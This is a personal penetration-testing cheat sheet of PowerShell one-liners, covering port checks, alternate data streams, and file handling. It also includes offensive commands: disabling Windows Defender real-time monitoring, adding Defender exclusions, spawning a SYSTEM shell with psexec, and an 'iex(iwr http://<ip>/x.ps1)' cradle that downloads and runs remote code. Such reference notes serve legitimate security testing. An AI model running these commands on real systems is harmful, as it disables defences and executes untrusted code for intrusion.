xct's notes
Search…
Powershell

General

Compact loop

1
1,2,3,4 | % {write-host $_}
Copied!

Scan selected ports

1
22,53,80,443,445 | % { Test-Connection -ComputerName <ip> -Port $_ }
Copied!

Unzip

1
Expand-Archive <>
2
Add-Type -assembly 'system.io.compression.filesystem';[io.compression.zipfile]::ExtractToDirectory("<archive path>","<target dir>")
Copied!

Check for hidden streams

1
Get-Item -Stream * <path>
Copied!

Disable Windows Defender

1
powershell.exe -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $true
Copied!

Add Defender Exception

1
Add-MpPreference -ExclusionPath <path>
Copied!

Check for Constrained Language Mode

1
$ExecutionContext.SessionState.LanguageMode
Copied!

Inject .ps1 into session

1
Invoke-Command -FilePath <script> -Sessions $sessions
2
Enter-PSSession -Session $sess
Copied!

Run cmd.exe as SYSTEM

1
psexec.exe -i -s %SystemRoot%\system32\cmd.exe
Copied!

File Transfer & Execution

1
iex(iwr http://<ip>/x.ps1 -usebasicparsing)
Copied!

Prevent Output Truncation

1
| Ft -autosize -wrap
2
| fl
Copied!

Encrypt files

1
# https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-65e7ae5d
2
$key = New-CryptographyKey -Algorithm AES
3
# Encrypt the file
4
Protect-File '.\secrets.txt' -Algorithm AES -Key $key -RemoveSource
5
# Decrypt the file
6
Unprotect-File '.\secrets.txt.AES' -Algorithm AES -Key $key -RemoveSource
Copied!

Alternate Data Stream (ADS)

1
powershell -command "get-item <file> -stream *"
2
powershell -command "get-content <file> -stream root.txt"
Copied!
Last modified 9mo ago